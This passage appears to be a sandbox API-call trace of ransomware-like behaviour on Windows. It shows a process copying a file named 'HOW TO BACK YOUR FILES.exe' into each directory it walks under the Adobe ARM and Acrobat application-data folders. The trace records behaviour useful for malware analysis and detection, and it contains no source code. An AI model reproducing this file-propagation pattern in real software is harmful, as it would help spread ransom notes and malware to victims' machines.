(lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 79 [0091.614] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.615] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.615] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.615] GetLastError () returned 0x0 [0091.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.615] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.615] CloseHandle (hObject=0x120) returned 1 [0091.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.615] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.616] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.616] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.616] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0091.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.616] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 93 [0091.616] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.616] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.616] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.616] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.617] GetLastError () returned 0x0 [0091.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.617] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.617] CloseHandle (hObject=0x120) returned 1 [0091.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.617] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.617] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.617] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.617] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0091.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.617] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 83 [0091.617] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.618] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.618] GetLastError () returned 0x0 [0091.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.618] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.618] CloseHandle (hObject=0x120) returned 1 [0091.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.618] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.619] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.619] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.619] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0091.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.619] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 88 [0091.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.619] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.620] GetLastError () returned 0x0 [0091.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.620] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.620] CloseHandle (hObject=0x120) returned 1 [0091.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.620] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.620] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.620] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.620] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 98 [0091.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.620] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.620] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.621] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.621] GetLastError () returned 0x0 [0091.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.621] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.621] CloseHandle (hObject=0x120) returned 1 [0091.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.621] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.621] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.621] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.622] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 107 [0091.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.622] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.622] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.622] GetLastError () returned 0x0 [0091.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.623] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.623] CloseHandle (hObject=0x120) returned 1 [0091.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.623] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.623] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.623] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.623] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe" [0091.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0091.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.623] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe") returned 58 [0091.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe" [0091.623] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.623] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.624] GetLastError () returned 0x0 [0091.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.624] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.624] CloseHandle (hObject=0x120) returned 1 [0091.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.624] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.624] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.624] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.624] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM" [0091.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.624] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM") returned 62 [0091.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM" [0091.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.625] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.625] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.625] GetLastError () returned 0x0 [0091.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.625] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.625] CloseHandle (hObject=0x120) returned 1 [0091.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.626] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.626] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0091.626] HeapFree (in: 